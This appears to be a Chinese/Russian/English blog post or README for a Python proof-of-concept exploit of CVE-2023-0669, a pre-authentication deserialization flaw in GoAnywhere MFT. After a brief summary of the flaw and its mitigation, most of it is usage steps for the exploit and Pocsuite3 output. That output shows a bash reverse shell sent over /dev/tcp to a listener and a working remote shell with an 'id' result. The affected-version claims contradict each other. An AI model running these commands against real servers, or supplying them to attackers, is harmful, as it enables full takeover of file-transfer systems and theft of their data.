
GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Уязвимости десериализации Python RCE PoC(Концептуальное доказательство)
CVE-2023-0669 GoAnywhere MFT 反序列化 - Je Yiuwai's Blog
CVE-2023-0669是一个GoAnywhere MFT反序列化漏洞,由于反序列化一个任意攻击者控制的对象,在License Response Servlet中存在一个预先认证的命令注入漏洞。攻击者可以利用该漏洞在受影响的系统上执行任意代码,从而导致系统被完全控制。该漏洞影响版本为7.1.2之前,不包括7.1.2。
CVE-2023-0669 — это уязвимость десериализации в GoAnywhere MFT, которая существует в LicenseResponseServlet из-за уязвимости инъекции команд до аутентификации. Она позволяет атакующему выполнить произвольный код на затронутой системе путем десериализации объекта, контролируемого атакующим. Уязвимость затрагивает версии до 7.1.2.
该漏洞可能会对企业级文件传输软件GoAnywhere MFT的安全性造成严重威胁。攻击者可以通过利用该漏洞来窃取敏感数据、篡改数据、破坏系统等。因此,用户需要及时采取措施来保护系统安全。
Уязвимость представляет серьезную угрозу для безопасности корпоративного ПО для передачи файлов GoAnywhere MFT. Атакующие могут использовать её для кражи конфиденциальных данных, их подмены и компрометации системы. Поэтому пользователям необходимо своевременно принимать меры для защиты системы.
官方已经发布了安全通告,并提供了初步检查方法。用户可以检查userdata/logs日志中是否有特定字符串出现来判断系统是否受到此漏洞的影响。如果无法更新补丁,建议采取其他安全措施来保护系统安全。
Официальный бюллетень безопасности уже опубликован, и предоставлены предварительные методы проверки. Пользователи могут проверить логи userdata/logs на наличие определенных строк, чтобы определить, затронута ли их система данной уязвимостью. Если невозможно применить патчи, рекомендуется принять другие меры безопасности для защиты системы.
总之,CVE-2023-0669是一个需要引起用户重视的反序列化漏洞,用户需要及时更新到最新版本,并检查系统是否受到此漏洞的影响。同时,建议用户加强对GoAnywhere MFT等企业级软件的安全管理,采取多层次的安全措施来保护系统安全。
В итоге, CVE-2023-0669 — это уязвимость десериализации, требующая внимания пользователей. Пользователям необходимо своевременно обновляться до последней версии и проверять, затронута ли их система данной уязвимостью. Кроме того, рекомендуется усилить управление безопасностью корпоративного ПО, такого как GoAnywhere MFT, и применять многоуровневые меры защиты для обеспечения безопасности системы.
This Exploit is a Python script used to exploit the vulnerability CVE-2023-0669 in GoAnywhere MFT v6.7.9594 and earlier versions.
Данный эксплойт — это скрипт на Python, используемый для эксплуатации уязвимости CVE-2023-0669 в GoAnywhere MFT v6.7.9594 и более ранних версиях.
This vulnerability exists because of a security issue in processing encrypted Bundle requests in GoAnywhere MFT. An attacker can send a specially crafted request to execute arbitrary code on the target server.
Эта уязвимость существует из-за проблемы безопасности при обработке зашифрованных запросов Bundle в GoAnywhere MFT. Атакующий может отправить специально сформированный запрос для выполнения произвольного кода на целевом сервере.
1.Clone this repository.
Клонируйте этот репозиторий.
git clone https://github.com/Avento/CVE-2023-0669.git
2.Enter the directory.
Перейдите в каталог.
cd CVE-2023-0669
3.Install the dependencies of requests and cryptography.
Установите зависимости: requests и cryptography.
pip install requests cryptography
4.Run the Exploit.
Запустите эксплойт.
python CVE-2023-0669.py --host <target IP>
Running this Exploit requires legal access rights and should not be used for illegal purposes.
As the execution of this Exploit poses a risk to the target server, the user is solely responsible for its risks and consequences.
Для запуска этого эксплойта требуются законные права доступа, и он не должен использоваться в незаконных целях.
Так как выполнение этого эксплойта создает риск для целевого сервера, пользователь несет полную ответственность за его риски и последствия.
$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url | poc-name | poc-id | component | version | status |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化 | CVE-2023-0669 | GoAnywhere MFT | 7.1.2 之前,不 包括 7.1.2 | success |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1 port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
Author:Je Yiuwai edit by xiaomi pad 6 pro